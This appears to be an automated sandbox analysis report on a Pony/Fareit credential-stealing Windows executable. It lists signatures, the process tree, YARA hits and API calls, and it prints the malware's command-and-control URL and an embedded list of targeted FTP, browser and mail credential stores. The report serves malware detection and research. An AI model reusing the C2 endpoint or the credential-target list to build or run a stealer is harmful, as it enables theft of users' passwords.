Windows Analysis Report 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Overview

General Information

Sample Name: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Analysis ID: 499220
MD5: 3087b67577a90aa611436c94ed23ae5a
SHA1: 6a84f2dd65787b2f9041421357c9939c63dd796d
SHA256: 2cec15c8fef9435abd5c332486d8ad7083eeb9eb84de9077b5bf6bb42458dba5
Tags: exe, Pony

Detection

Fareit Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Yara detected Fareit stealer
Detected unpacking (changes PE section rights)
Yara detected Pony
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Sigma detected: PowerShell Script Run in AppData

Process Tree

  • System is w10x64
  • 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' MD5: 3087B67577A90AA611436C94ED23AE5A)
    • 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' MD5: 3087B67577A90AA611436C94ED23AE5A)
      • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 3184 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Adnexal8.exe (PID: 5600 cmdline: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' MD5: CEA30515CD73B348562CA2ABE1E4D47C)
      • Adnexal8.exe (PID: 6892 cmdline: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' MD5: CEA30515CD73B348562CA2ABE1E4D47C)
        • cmd.exe (PID: 4540 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Pony

{"C2 list": ["http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp | JoeSecurity_Fareit | Yara detected Fareit stealer | Joe Security |
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0x12ddb:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x14f5b:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x12610:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0x12cce:$s3: POST %s HTTP/1.0
  • 0x12cf7:$s4: Accept-Encoding: identity, *;q=0
00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Fareit | Yara detected Fareit stealer | Joe Security |
00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |

          Unpacked PEs

          Source | Rule | Description | Author | Strings
          1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack | JoeSecurity_Fareit | Yara detected Fareit stealer | Joe Security |
          1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
          1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
          1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack | pony | Identify Pony | Brian Wallace @botnet_hunter |
            • 0x14819:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            • 0x16999:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            • 0x1404e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
            • 0x1470c:$s3: POST %s HTTP/1.0
            • 0x14735:$s4: Accept-Encoding: identity, *;q=0
          12.2.Adnexal8.exe.400000.0.raw.unpack | JoeSecurity_Fareit | Yara detected Fareit stealer | Joe Security |

                  Sigma Overview

                  System Summary:

                  Sigma detected: PowerShell Script Run in AppData
                  Source: Process startedAuthor: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', CommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\Adnexal8.exe' , ParentImage: C:\Users\user\AppData\Roaming\Adnexal8.exe, ParentProcessId: 6892, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' ', ProcessId: 4540

                  Jbx Signature Overview

                  AV Detection:

                  Found malware configuration
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack Malware Configuration Extractor: Pony {"C2 list": ["http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php"]}
                  Multi AV Scanner detection for submitted file
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Virustotal: Detection: 73%
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Metadefender: Detection: 71%
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe ReversingLabs: Detection: 89%
                  Antivirus / Scanner detection for submitted sample
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Avira: detected
                  Yara detected Pony
                  Source: Yara match File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe Avira: detection malicious, Label: HEUR/AGEN.1112794
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe Metadefender: Detection: 72%
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe ReversingLabs: Detection: 89%
                  Machine Learning detection for sample
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Joe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe Joe Sandbox ML: detected
                  Source: 10.2.Adnexal8.exe.4d141c2.1.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: 12.2.Adnexal8.exe.400000.0.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: 12.1.Adnexal8.exe.400000.0.unpack Avira: Label: TR/Kryptik.avp.8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D423
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040A364 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,1_2_0040A364
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040A1A9 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,1_2_0040A1A9
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004041BC CryptUnprotectData,LocalFree,1_2_004041BC
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040A5BD CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,1_2_0040A5BD
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040BA2E CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,1_2_0040BA2E
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040CEA2 lstrlenA,CryptUnprotectData,LocalFree,1_2_0040CEA2
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040A774 lstrlenA,CryptUnprotectData,LocalFree,1_2_0040A774
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,12_2_0040D423
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040A364 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,12_2_0040A364
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040A1A9 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,12_2_0040A1A9
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_004041BC CryptUnprotectData,LocalFree,12_2_004041BC
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040A5BD CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,12_2_0040A5BD
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040BA2E CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,12_2_0040BA2E
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040CEA2 lstrlenA,CryptUnprotectData,LocalFree,12_2_0040CEA2
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040A774 lstrlenA,CryptUnprotectData,LocalFree,12_2_0040A774

                  Compliance:

                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Unpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe Unpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404C68
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040890D
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_00404FD8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00403F86
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00409484
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408789
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_1_00404C68
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_0040890D
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_1_00404FD8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_00403F86
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_1_00409484
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_00408789
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_00404C68
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0040890D
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_00404FD8
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_00403F86
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_00409484
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_00408789
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_1_00404C68
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_0040890D
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_1_00404FD8
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_00403F86
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_1_00409484
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_00408789
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

                  Networking:

                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractor URLs: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNWeb DataLogin Dataloginsorigin_urlpassword_valueusername_valueftp://http://https://moz_loginshostnameencryptedPasswordencryptedUsername\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, Adnexal8.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
                  Source: Adnexal8.exeString found in binary or memory: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.phpYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI
                  Source: Adnexal8.exe, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
